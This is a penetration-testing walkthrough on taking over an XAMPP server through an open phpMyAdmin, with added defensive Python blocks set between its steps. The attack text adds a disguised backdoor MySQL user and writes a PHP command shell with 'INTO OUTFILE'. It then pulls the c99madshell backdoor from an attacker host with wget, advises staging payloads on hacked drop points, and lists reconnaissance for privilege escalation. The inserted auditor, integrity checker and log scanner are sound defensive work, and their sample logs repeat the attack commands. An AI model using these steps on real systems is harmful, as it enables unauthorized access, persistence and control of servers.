An Open Door
It all begins with a basic error. In this case, the entry point was a default installation of phpMyAdmin, which is a GUI based interface for MySQL, the powerful database application that is considered the standard for open source junkies. Specifically, this gaping hole was a result of a standard XAMPP installation, which leaves phpMyAdmin wide open and available to anyone who happens to find it. Unfortunately for the server administrator, the hole was enough to give the red cell all that was needed to launch a multi-staged exploitation session that eventually led to root access of the target system.
As previously mentioned, phpMyAdmin is only a front end to MySQL. Ironically, thanks to the lack of a valid remote user account in MySQL, the database engine was secure against direct MySQL connections over port 3306. Yet, thanks to the web-based phpMyAdmin GUI, full control over the database was not only possible but trivial. The first step in the attack was to add a user with full read/write access to the databases hosted by MySQL. While not a necessary “hack” in this narrative, it is always a good idea to get your tentacles into a system in a variety of ways, just in case one of the entry points is discovered.
To add a user, simply click on the Privileges link on the main page, and then Add User. Type in a nondescript user name (e.g., mysql, backup, sqlbu), enter your password, ensure you grant the user global privileges, and save it. Once added, take note of the back door and continue through the wide open front door for simplicity’s sake!
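The root cause on this page is a phpMyAdmin configuration that logs every visitor straight in. The following is an added defensive check, not code from the page or from the phpMyAdmin project: it parses the per-server settings of a config.inc.php and flags the settings that produce exactly this open door (auth_type set to 'config' with a stored root account and empty password, and AllowNoPassword enabled). The sample configuration is constructed here and assumes a single server block, so the `$i++` counter is ignored.

```python
import re

# Constructed sample in the shape of an XAMPP-style config.inc.php. It is not
# copied from any real installation; it simply carries the weak settings the
# page describes (stored root login with an empty password).
SAMPLE_CONFIG = r"""
<?php
$cfg['blowfish_secret'] = 'xampp';
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
$cfg['Servers'][$i]['host'] = '127.0.0.1';
"""

# Constructed hardened counterpart: cookie authentication, no stored password,
# and MySQL accounts without a password are refused at the login form.
HARDENED_CONFIG = r"""
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['host'] = '127.0.0.1';
"""

# Matches one assignment such as  $cfg['Servers'][$i]['auth_type'] = 'config';
SETTING_RE = re.compile(
    r"""\$cfg\['Servers'\]\[\$i\]\['(?P<key>\w+)'\]\s*=\s*"""
    r"""(?P<val>'[^']*'|"[^"]*"|true|false|\d+)\s*;"""
)


def parse_server_settings(text):
    """Return {setting: value} for the server block (assumes one server)."""
    settings = {}
    for m in SETTING_RE.finditer(text):
        val = m.group("val")
        if val in ("true", "false"):
            settings[m.group("key")] = val == "true"
        else:
            settings[m.group("key")] = val.strip("'\"")
    return settings


def audit(settings):
    """Return a list of human-readable findings for the parsed settings."""
    findings = []
    # phpMyAdmin defaults to 'cookie' when auth_type is not set.
    if settings.get("auth_type", "cookie") == "config":
        findings.append("auth_type 'config': every visitor is logged in with the "
                        "stored credentials; use 'cookie' or 'http'")
        if settings.get("user") == "root":
            findings.append("stored account is root: the web UI carries full "
                            "MySQL privileges, including FILE")
        if settings.get("password") == "":
            findings.append("stored password is empty")
    if settings.get("AllowNoPassword") is True:
        findings.append("AllowNoPassword is true: password-less MySQL accounts "
                        "can log in through the web UI")
    return findings


if __name__ == "__main__":
    for name, cfg in (("sample", SAMPLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(parse_server_settings(cfg)))
```

The check is deliberately a text-level linter so it can run from a host-inventory job without PHP installed; on a real deployment, point it at the installed config.inc.php and treat any finding as equivalent to an unauthenticated database console.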
Because the default installation of phpMyAdmin gives the user full access to the rather powerful MySQL commands, the next step is to create a back door to the server itself. There are many ways to do this, the simplest of which is to execute the following command via the SQL query option in phpMyAdmin:
select "<? system($_REQUEST['cmd']); ?>" into outfile "/opt/lampp/htdocs/cmd.php";
This command will create a file named cmd.php in the root directory of the resources made available by XAMPP. If phpMyAdmin was not installed in conjunction with this all-in-one package, then you might need to point your outfile to the /var/www/html/ directory or another folder commonly used by Apache to store the web page files. Once you do successfully create the file, you now have pseudo command-line access to the target system, albeit a bit lacking when it comes to ease of use.
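The outfile step leaves a durable trace: a new PHP file appears in the document root that no deployment put there. A file-integrity baseline of the web root catches it regardless of how the file was named. The following is an added example, not code from the page: it snapshots a directory tree as SHA-256 digests, diffs a later snapshot against it, and singles out new or changed files with web-executable extensions. The demo builds a constructed document root in a temporary directory and drops a placeholder cmd.php (a comment only, not a shell) to show the alert firing.

```python
import hashlib
import os
import tempfile

# Extensions the web server would execute; a new file with one of these in
# the document root deserves an immediate look.
EXECUTABLE_EXT = {".php", ".phtml", ".php5", ".phar", ".cgi", ".pl"}


def hash_file(path):
    """SHA-256 of a file's contents, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every regular file under root (relative path) to its digest."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            result[rel] = hash_file(full)
    return result


def diff_snapshots(baseline, current):
    """Return sorted lists of new, modified and removed files, plus the
    subset of new/modified files that the web server would execute."""
    new = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current
                      if p in baseline and baseline[p] != current[p])
    suspicious = sorted(p for p in new + modified
                        if os.path.splitext(p)[1].lower() in EXECUTABLE_EXT)
    return {"new": new, "modified": modified,
            "removed": removed, "suspicious": suspicious}


def demo():
    """Constructed scenario: baseline a small docroot, then a cmd.php shows up."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "css"))
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "css", "style.css"), "w") as f:
            f.write("body { margin: 0; }\n")
        baseline = snapshot(root)          # taken at deployment time

        # Constructed placeholder standing in for the dropped file; it is a
        # PHP comment only, not a working shell.
        with open(os.path.join(root, "cmd.php"), "w") as f:
            f.write("<?php /* constructed placeholder */ ?>\n")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

In production the baseline would be stored off-host (an attacker who can write the docroot can also rewrite a manifest kept beside it), and the comparison scheduled frequently enough that a dropped file is noticed before the next stage of the attack described below.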
Because the user experience is a top priority, the next step is to upgrade the minimalistic “shell” into something a bit more powerful and robust. One method is to install a PHP-based back door into the system that can provide a remote attacker with countless features and functions. A wide variety of these PHP shell emulators are available online, but in this case we will illustrate the c99madshell v2.
The first step is to download the shell and store it on a remotely accessible server that the target system can reach. Make sure that you DO NOT upload the PHP shell to your server as a *.php file. While malicious hackers will typically use a drop point they have previously hacked to store these files, penetration testers are probably going to use a personal site. If the site administrator is diligent and notices the attack, he or she will check the logs, which will point right back to the attacker’s server. Storing a backdoor shell script in its native format will then give the inquisitive administrator shell access to that system, not to mention anyone else who might find it! So, it is best to store the file as a .txt file or something equally benign. The following command will download the Madshell PHP file to the target system:
http://<target>/cmd.php?cmd=wget http://<evilserver>/c99madshell.txt -O madshell.php
Figure 1 illustrates the end result. Ironically, these PHP-based back doors are actually very useful as a remote web-based administrator tool, even if they are intended for malicious activities.
Figure 1 c99madshell v.2.0
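Every stage above passes through the web server, so the Apache access log records it: the phpMyAdmin session from a remote address, the INTO OUTFILE query, and the cmd= requests that fetch and install the second shell. The following is an added example, not code from the page: a small scanner that parses Apache combined-format lines and applies three rules (phpMyAdmin reached from a non-loopback address, a decoded request containing INTO OUTFILE or INTO DUMPFILE, and any request carrying a cmd parameter). The log lines are constructed for this example; the hostnames and addresses in them are documentation ranges and the .invalid TLD, not real infrastructure.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Apache combined log format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
OUTFILE_RE = re.compile(r"\binto\s+(?:out|dump)file\b", re.IGNORECASE)
LOOPBACK = {"127.0.0.1", "::1"}

# Constructed sample log, in the order the page's stages would occur.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2023:13:50:01 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /phpmyadmin/sql.php?db=test&sql_query=select+%22x%22+into+outfile+%22%2Fopt%2Flampp%2Fhtdocs%2Fcmd.php%22 HTTP/1.1" 200 900
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /cmd.php?cmd=wget+http%3A%2F%2Fdrop.example.invalid%2Fc99madshell.txt+-O+madshell.php HTTP/1.1" 200 12
198.51.100.7 - - [10/Oct/2023:14:01:44 +0000] "GET /index.php HTTP/1.1" 200 2048
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_request(entry):
    """Apply the three detection rules to one parsed entry."""
    findings = []
    parts = urlsplit(entry["target"])
    path = parts.path.lower()
    decoded = unquote_plus(entry["target"])

    if path.startswith("/phpmyadmin") and entry["ip"] not in LOOPBACK:
        findings.append(("pma_remote_access", entry["ip"]))
    if OUTFILE_RE.search(decoded):
        findings.append(("sql_into_outfile", decoded))
    params = parse_qs(parts.query)
    if "cmd" in params:
        findings.append(("cmd_parameter", params["cmd"][0]))
    return findings


def scan(log_text):
    """Scan a whole log; returns a list of (line_no, rule, detail)."""
    results = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        for rule, detail in check_request(entry):
            results.append((line_no, rule, detail))
    return results


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only GET requests expose their query in the access log; phpMyAdmin normally submits SQL by POST, so the outfile rule is best paired with the MySQL general or audit log, while the cmd-parameter rule is robust because cmd.php is driven by URL parameters.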
From here, the options are up to the imagination of the attacker. However, keep in mind that any system-level code that is executed will run within the context of a reduced-privilege account, typically either nobody or apache. In other words, unless the “root” account started the web server (highly unlikely, but not impossible), any commands sent via the PHP shell will be limited. As a result, escalated privileges are highly desired. Unfortunately, obtaining such privileges can often be a daunting task depending on the administrator’s ability to keep the target system patched. Yet, where there is a will there is a way... as the following illustrates.
Step one is to figure out what version of software you are dealing with. This is important because there is a high chance that if the system kernel level can be determined, then you can also locate a privilege escalation exploit. To narrow down our possible exploits, you will need to perform a bit of system probing via cat commands. Specifically, the following should help:
cat /etc/*-release
cat /etc/*-version
uname -a
cat /etc/issue
Chances are rather high that you will discover what system and kernel version is running on the target system. The following is the option list provided by the uname --help command:
-a Display all possible information. Invokes all other options except -S.
-m Display the name of the hardware (i.e., 68020, 386i, 3B20).
-n Display the network nodename. The nodename is the name the system is known by on a network.
-p Display processor type (i.e., i386, 68020, 68030, SPARC, R3000).
-r Display the release number of the operating system.
-s Display the name of the UNIX system. This option is the default; if no other options are listed, it is used.
-v Display the version of the UNIX system. The version is usually set by the local system administrator.
-S The super-user may change the system name and the nodename by using the -S option. The system name can only contain eight characters. Not supported on some systems.
At this point, you will need to analyze the results and build a mirrored attack environment. While this may seem like a lot of extra work, the best way to infiltrate a target system is to emulate it, create an attack scenario based upon the test system, and then launch that attack against the target network.